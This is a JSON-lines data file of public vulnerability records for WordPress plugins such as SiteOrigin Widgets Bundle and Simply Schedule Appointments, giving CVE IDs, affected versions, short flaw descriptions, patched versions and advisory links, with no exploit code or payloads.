{"CVE_ID":"CVE-2024-5901","slug":"so-widgets-bundle","versionImpact":"1.62.2","versionEndExcluding":"1.62.3","description":"The SiteOrigin Widgets Bundle plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Image Grid widget in all versions up to, and including, 1.62.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.62.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0045c5a4-0807-4e89-8639-0802e54ce6ab?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0045c5a4-0807-4e89-8639-0802e54ce6ab?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/so-widgets-bundle\\\/tags\\\/1.62.0\\\/widgets\\\/image-grid\\\/tpl\\\/default.php#L28\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/so-widgets-bundle\\\/tags\\\/1.62.0\\\/widgets\\\/image-grid\\\/tpl\\\/default.php#L28\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/so-widgets-bundle\\\/tags\\\/1.62.0\\\/widgets\\\/image-grid\\\/image-grid.php#L282\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/so-widgets-bundle\\\/tags\\\/1.62.0\\\/widgets\\\/image-grid\\\/image-grid.php#L282\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5090","slug":"so-widgets-bundle","versionImpact":"1.61.1","versionEndExcluding":"1.62.0","description":"The SiteOrigin Widgets Bundle plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's SiteOrigin Blog Widget in all versions up to, and including, 1.61.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.62.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2878de45-0123-4e07-bfec-015b36b11d01?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2878de45-0123-4e07-bfec-015b36b11d01?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3098819\\\/so-widgets-bundle\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3098819\\\/so-widgets-bundle\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4362","slug":"so-widgets-bundle","versionImpact":"1.60.0","versionEndExcluding":"1.61.0","description":"The SiteOrigin Widgets Bundle plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'siteorigin_widget' shortcode in all versions up to, and including, 1.60.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.61.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b7926ec6-3441-4062-93b2-6c2120c9f406?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b7926ec6-3441-4062-93b2-6c2120c9f406?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/so-widgets-bundle\\\/trunk\\\/base\\\/inc\\\/shortcode.php#L27\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/so-widgets-bundle\\\/trunk\\\/base\\\/inc\\\/shortcode.php#L27\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3088997\\\/so-widgets-bundle\\\/trunk\\\/base\\\/inc\\\/shortcode.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3088997\\\/so-widgets-bundle\\\/trunk\\\/base\\\/inc\\\/shortcode.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2225","slug":"responsive-addons-for-elementor","versionImpact":"1.6.9","versionEndExcluding":"1.6.9.1","description":"The Responsive Addons for Elementor \u2013 Free Elementor Addons Plugin and Elementor Templates plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018rael_title_tag' parameter in all versions up to, and including, 1.6.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The vulnerability was partially patched in version 1.6.9.","recommendation":"Update to version 1.6.9.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/responsive-addons-for-elementor\\\/trunk\\\/includes\\\/widgets-manager\\\/widgets\\\/class-responsive-addons-for-elementor-icon-box.php#L2499\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/responsive-addons-for-elementor\\\/trunk\\\/includes\\\/widgets-manager\\\/widgets\\\/class-responsive-addons-for-elementor-icon-box.php#L2499\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3261241\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3261241\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3263280\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3263280\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f5ace7fb-530e-4a69-bbf7-e2c66491dd75?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f5ace7fb-530e-4a69-bbf7-e2c66491dd75?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2228","slug":"responsive-addons-for-elementor","versionImpact":"1.6.8","versionEndExcluding":"1.6.9","description":"The Responsive Addons for Elementor \u2013 Free Elementor Addons Plugin and Elementor Templates plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.6.8 the 'register_user' function. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive data including usernames and passwords of any users who register via the Edit Login | Registration Form widget, as long as that user opens the email notification for successful registration.","recommendation":"Update to version 1.6.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/responsive-addons-for-elementor\\\/trunk\\\/includes\\\/modules-manager\\\/login-register\\\/class-login-register.php#L369\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/responsive-addons-for-elementor\\\/trunk\\\/includes\\\/modules-manager\\\/login-register\\\/class-login-register.php#L369\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3261241\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3261241\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/659ef2e8-589c-4901-88ce-1d674c056ece?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/659ef2e8-589c-4901-88ce-1d674c056ece?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2580","slug":"ai-engine","versionEndExcluding":"1.6.83","description":"The AI Engine WordPress plugin before 1.6.83 does not sanitize and escape some of its settings, which could allow high-privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example, in multisite setup).","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7ee1efb1-9969-40b2-8ab2-ea427091bbd8\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7ee1efb1-9969-40b2-8ab2-ea427091bbd8\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1119","slug":"simply-schedule-appointments","versionImpact":"1.6.8.5","versionEndExcluding":"1.6.8.7","description":"The Appointment Booking Calendar \u2014 Simply Schedule Appointments Booking Plugin plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 1.6.8.5. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.","recommendation":"Update to version 1.6.8.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3250719\\\/simply-schedule-appointments\\\/trunk\\\/booking-app-new\\\/page-appointment-edit.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3250719\\\/simply-schedule-appointments\\\/trunk\\\/booking-app-new\\\/page-appointment-edit.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1be557db-daa8-4d86-819a-462f29da884b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1be557db-daa8-4d86-819a-462f29da884b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13431","slug":"simply-schedule-appointments","versionImpact":"1.6.8.3","versionEndExcluding":"1.6.8.5","description":"The Appointment Booking Calendar \u2014 Simply Schedule Appointments Booking Plugin plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the accent_color and background parameter in all versions up to, and including, 1.6.8.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.6.8.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simply-schedule-appointments\\\/trunk\\\/booking-app-new\\\/iframe-inner.php#L182\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simply-schedule-appointments\\\/trunk\\\/booking-app-new\\\/iframe-inner.php#L182\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simply-schedule-appointments\\\/trunk\\\/booking-app-new\\\/iframe-inner.php#L189\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simply-schedule-appointments\\\/trunk\\\/booking-app-new\\\/iframe-inner.php#L189\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3246760\\\/simply-schedule-appointments\\\/trunk\\\/booking-app-new\\\/iframe-inner.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3246760\\\/simply-schedule-appointments\\\/trunk\\\/booking-app-new\\\/iframe-inner.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f6e3e5dd-b9f1-4d24-98cc-b6ab319434e4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f6e3e5dd-b9f1-4d24-98cc-b6ab319434e4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1505","slug":"woocommerce-ajax-filters","versionImpact":"1.6.8.1","versionEndExcluding":"1.6.8.2","description":"The Advanced AJAX Product Filters plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'nonce' parameter in all versions up to, and including, 1.6.8.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.6.8.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3245830\\\/woocommerce-ajax-filters\\\/trunk\\\/includes\\\/wizard.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3245830\\\/woocommerce-ajax-filters\\\/trunk\\\/includes\\\/wizard.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/94b289bf-0ef1-47d1-98bd-8f7bb753c2bc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/94b289bf-0ef1-47d1-98bd-8f7bb753c2bc?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-43935","slug":"delicious-recipes","versionImpact":"1.6.7","versionEndExcluding":"1.6.8","description":"Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in WP Delicious Delicious Recipes \u2013 WordPress Recipe Plugin allows Stored XSS.This issue affects Delicious Recipes \u2013 WordPress Recipe Plugin: from n\/a through 1.6.7.","recommendation":"Update to version 1.6.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/delicious-recipes\\\/wordpress-wp-delicious-recipe-plugin-for-food-bloggers-formerly-delicious-recipes-plugin-1-6-7-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/delicious-recipes\\\/wordpress-wp-delicious-recipe-plugin-for-food-bloggers-formerly-delicious-recipes-plugin-1-6-7-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2749","slug":"vikbooking","versionImpact":"1.6.7","versionEndExcluding":"1.6.8","description":"The VikBooking Hotel Booking Engine & PMS WordPress plugin before 1.6.8's access control mechanism fails to properly restrict access to its settings, permitting any users that can access a menu to manipulate requests and perform unauthorized actions such as editing, renaming or deleting (categories for example) despite initial settings prohibiting such access. This vulnerability resembles broken access control, enabling unauthorized users to modify critical VikBooking Hotel Booking Engine & PMS WordPress plugin before 1.6.8 configurations.","recommendation":"Update to version 1.6.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c0640d3a-80b3-4cad-a3cf-fb5d86558e91\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c0640d3a-80b3-4cad-a3cf-fb5d86558e91\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2441","slug":"vikbooking","versionImpact":"1.6.7","versionEndExcluding":"1.6.8","description":"The VikBooking Hotel Booking Engine & PMS WordPress plugin before 1.6.8 allows direct access to menus, allowing an authenticated user with subscriber privileges or above, to bypass authorization and access settings of the VikBooking Hotel Booking Engine & PMS WordPress plugin before 1.6.8's they shouldn't be allowed to.","recommendation":"Update to version 1.6.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9647e273-5724-4a02-868d-9b79f4bb2b79\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9647e273-5724-4a02-868d-9b79f4bb2b79\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2006","slug":"post-grid-carousel-ultimate","versionImpact":"1.6.7","versionEndExcluding":"1.6.8","description":"The Post Grid, Slider & Carousel Ultimate \u2013 with Shortcode, Gutenberg Block & Elementor Widget plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.6.7 via deserialization of untrusted input in the outpost_shortcode_metabox_markup function. This makes it possible for authenticated attackers, with contributor-level access and above, to inject a PHP Object. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.","recommendation":"Update to version 1.6.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8cf1b234-862b-41a0-ab63-a986f8023613?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8cf1b234-862b-41a0-ab63-a986f8023613?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/post-grid-carousel-ultimate\\\/trunk\\\/includes\\\/classes\\\/metabox.php#L43\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/post-grid-carousel-ultimate\\\/trunk\\\/includes\\\/classes\\\/metabox.php#L43\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=\\\/post-grid-carousel-ultimate\\\/tags\\\/1.6.7&old=3045923&new_path=\\\/post-grid-carousel-ultimate\\\/tags\\\/1.6.8&new=3045923&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=\\\/post-grid-carousel-ultimate\\\/tags\\\/1.6.7&old=3045923&new_path=\\\/post-grid-carousel-ultimate\\\/tags\\\/1.6.8&new=3045923&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7644","slug":"pixel-gallery","versionImpact":"1.6.7","versionEndExcluding":"1.6.8","description":"The Pixel Gallery Addons for Elementor \u2013 Easy Grid, Creative Gallery, Drag and Drop Grid, Custom Grid Layout, Portfolio Gallery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via URLs in all widgets in all versions up to, and including, 1.6.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.6.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3328206%40pixel-gallery&new=3328206%40pixel-gallery&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3328206%40pixel-gallery&new=3328206%40pixel-gallery&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a3fbf26b-c7d8-4c44-b3c1-c4e028465a9e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a3fbf26b-c7d8-4c44-b3c1-c4e028465a9e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3345","slug":"learning-management-system","versionEndExcluding":"1.6.8","description":"The LMS by Masteriyo WordPress plugin before 1.6.8 does not properly safeguards sensitive user information, like other user's email addresses, making it possible for any students to leak them via some of the plugin's REST API endpoints.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0d07423e-98d2-43a3-824d-562747a3d65a\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0d07423e-98d2-43a3-824d-562747a3d65a\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13508","slug":"booking-package","versionImpact":"1.6.72","versionEndExcluding":"1.6.73","description":"The Booking Package plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the locale parameter in all versions up to, and including, 1.6.72 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.6.73, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/booking-package\\\/tags\\\/1.6.71\\\/index.php#L1714\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/booking-package\\\/tags\\\/1.6.71\\\/index.php#L1714\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/212e8f84-22a9-4b9e-b440-280f8569846f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/212e8f84-22a9-4b9e-b440-280f8569846f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7877","slug":"simply-schedule-appointments","versionImpact":"1.6.7.53","versionEndExcluding":"1.6.7.55","description":"The Appointment Booking Calendar \u2014 Simply Schedule Appointments Booking Plugin WordPress plugin before 1.6.7.55 does not sanitise and escape some of its Notification settings, which could allow high privilege users such as admin to perform Cross-Site Scripting attacks even when unfiltered_html is disallowed","recommendation":"Update to version 1.6.7.55, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fbec3738-2135-458d-be25-1ffb00e6deb6\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fbec3738-2135-458d-be25-1ffb00e6deb6\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7876","slug":"simply-schedule-appointments","versionImpact":"1.6.7.53","versionEndExcluding":"1.6.7.55","description":"The Appointment Booking Calendar \u2014 Simply Schedule Appointments Booking Plugin WordPress plugin before 1.6.7.55 does not sanitise and escape some of its Appointment Type settings, which could allow high privilege users such as admin to perform Cross-Site Scripting attacks even when unfiltered_html is disallowed","recommendation":"Update to version 1.6.7.55, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fffe862f-5bf0-4a05-9d32-caff0bfdb860\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fffe862f-5bf0-4a05-9d32-caff0bfdb860\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7129","slug":"simply-schedule-appointments","versionImpact":"1.6.7.42","versionEndExcluding":"1.6.7.43","description":"The Appointment Booking Calendar \u2014 Simply Schedule Appointments Booking Plugin WordPress plugin before 1.6.7.43 does not escape template syntax provided via user input, leading to Twig Template Injection which further exploited can result to remote code Execution by high privilege such as admins","recommendation":"Update to version 1.6.7.43, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/00ad9b1a-97a5-425f-841e-ea48f72ecda4\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/00ad9b1a-97a5-425f-841e-ea48f72ecda4\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4288","slug":"simply-schedule-appointments","versionImpact":"1.6.7.14","versionEndExcluding":"1.6.7.18","description":"The Appointment Booking Calendar \u2014 Simply Schedule Appointments Booking Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018link\u2019 parameter in versions up to, and including, 1.6.7.14 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.6.7.18, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/84262b4a-a662-4aaf-9eae-f5cca8f6cd06?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/84262b4a-a662-4aaf-9eae-f5cca8f6cd06?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simply-schedule-appointments\\\/trunk\\\/includes\\\/class-shortcodes.php#L677\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simply-schedule-appointments\\\/trunk\\\/includes\\\/class-shortcodes.php#L677\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3087297\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3087297\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4279","slug":"user-activity-log","versionEndExcluding":"1.6.7","description":"This User Activity Log WordPress plugin before 1.6.7 retrieves client IP addresses from potentially untrusted headers, allowing an attacker to manipulate its value. This may be used to hide the source of malicious traffic.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2bd2579e-b383-4d12-b207-6fc32cfb82bc\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2bd2579e-b383-4d12-b207-6fc32cfb82bc\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0820","slug":"user-role","versionEndExcluding":"1.6.7","description":"The User Role by BestWebSoft WordPress plugin before 1.6.7 does not protect against CSRF in requests to update role capabilities, leading to arbitrary privilege escalation of any role.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b93d9f9d-0fd9-49b8-b465-d32b95351912\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b93d9f9d-0fd9-49b8-b465-d32b95351912\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11324","slug":"accounting-for-woocommerce","versionImpact":"1.6.6","versionEndExcluding":"1.6.7","description":"The Accounting for WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.6.6. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.6.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/accounting-for-woocommerce\\\/tags\\\/stable\\\/views\\\/export.php#L46\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/accounting-for-woocommerce\\\/tags\\\/stable\\\/views\\\/export.php#L46\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3201725\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3201725\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f34b7518-5cb3-4b4e-8b18-927c08c045f7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f34b7518-5cb3-4b4e-8b18-927c08c045f7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0559","slug":"enhanced-text-widget","versionImpact":"1.6.5","versionEndExcluding":"1.6.6","description":"The Enhanced Text Widget WordPress plugin before 1.6.6 does not validate and escape some of its Widget options before outputting them back in attributes, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 1.6.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b257daf2-9540-4a0f-a560-54b47d2b913f\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b257daf2-9540-4a0f-a560-54b47d2b913f\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/research.cleantalk.org\\\/cve-2024-0559\\\/\",\"name\":\"https:\\\/\\\/research.cleantalk.org\\\/cve-2024-0559\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4269","slug":"user-activity-log","versionEndExcluding":"1.6.6","description":"The User Activity Log WordPress plugin before 1.6.6 lacks proper authorisation when exporting its activity logs, allowing any authenticated users, such as subscriber to perform such action and retrieve PII such as email addresses.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/db3e4336-117c-47f2-9b43-2ca115525297\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/db3e4336-117c-47f2-9b43-2ca115525297\",\"refsource\":\"MISC\",\"tags\":[]}]"}
